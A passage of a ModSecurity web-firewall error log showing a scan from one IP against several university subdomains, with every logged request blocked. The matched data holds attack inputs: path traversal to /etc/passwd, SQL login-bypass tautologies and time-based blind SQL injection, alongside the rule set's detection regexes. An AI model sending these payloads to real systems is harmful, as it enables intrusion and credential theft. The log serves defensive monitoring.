"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAcsLPMAAAAE"]
[Tue Aug 29 11:43:59.376138 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13j8Co-f0AAAfiYkQAAAAg"]
[Tue Aug 29 11:43:59.378741 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAdb7vsAAAAb"]
[Tue Aug 29 11:43:59.381442 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAfZj1EAAAAN"]
[Tue Aug 29 11:43:59.387350 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAfFKBsAAAAR"]
[Tue Aug 29 11:43:59.387877 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAenGdkAAAAM"]
[Tue Aug 29 11:44:00.266496 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.2.231.232_e751e2b8582d017966dab0d237fa5c54c17392ad"): Internal error [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13j8Co-f0AAAfcoM0AAAAa"]
[Tue Aug 29 11:44:00.999126 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13kMCo-f0AAAftVBsAAAAf"]
[Tue Aug 29 11:44:03.447939 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdQ3okAAAAV"]
[Tue Aug 29 11:44:03.450652 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAeX1LEAAAAK"]
[Tue Aug 29 11:44:03.468798 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdQ3ooAAAAV"]
[Tue Aug 29 11:44:03.471359 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAfcoNcAAAAa"]
[Tue Aug 29 11:44:03.539485 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAeX1LUAAAAK"]
[Tue Aug 29 11:44:03.622506 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7w4AAAAb"]
[Tue Aug 29 11:44:03.661166 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7xAAAAAb"]
[Tue Aug 29 11:44:03.681138 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7xEAAAAb"]
[Tue Aug 29 11:44:03.720471 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAf53SAAAAAR"]
[Tue Aug 29 11:44:03.739312 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAf53SEAAAAR"]
[Tue Aug 29 11:44:04.384656 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13lMCo-f0AAAfGabEAAAAT"]
[Tue Aug 29 11:44:05.388647 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13lcCo-f0AAAfloRQAAAAj"]
[Tue Aug 29 11:44:07.383084 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAeX1MIAAAAK"]
[Tue Aug 29 11:44:07.384051 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAfky9sAAAAi"]
[Tue Aug 29 11:44:07.385044 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAdQ3owAAAAV"]
[Tue Aug 29 11:44:07.398492 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAcsLQcAAAAE"]
[Tue Aug 29 11:44:08.376121 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfZj2cAAAAN"]
[Tue Aug 29 11:44:08.391440 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAfcoOEAAAAa"]
[Tue Aug 29 11:44:08.396534 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAdfteYAAAAG"]
[Tue Aug 29 11:44:08.400528 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAc4EvsAAAAP"]
[Tue Aug 29 11:44:08.401666 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdOeYsAAAAS"]
[Tue Aug 29 11:44:08.412808 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfWN0sAAAAL"]
[Tue Aug 29 11:44:08.427612 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdxUcsAAAAC"]
[Tue Aug 29 11:44:08.439604 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdeQ9sAAAAQ"]
[Tue Aug 29 11:44:08.439912 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfky@EAAAAi"]
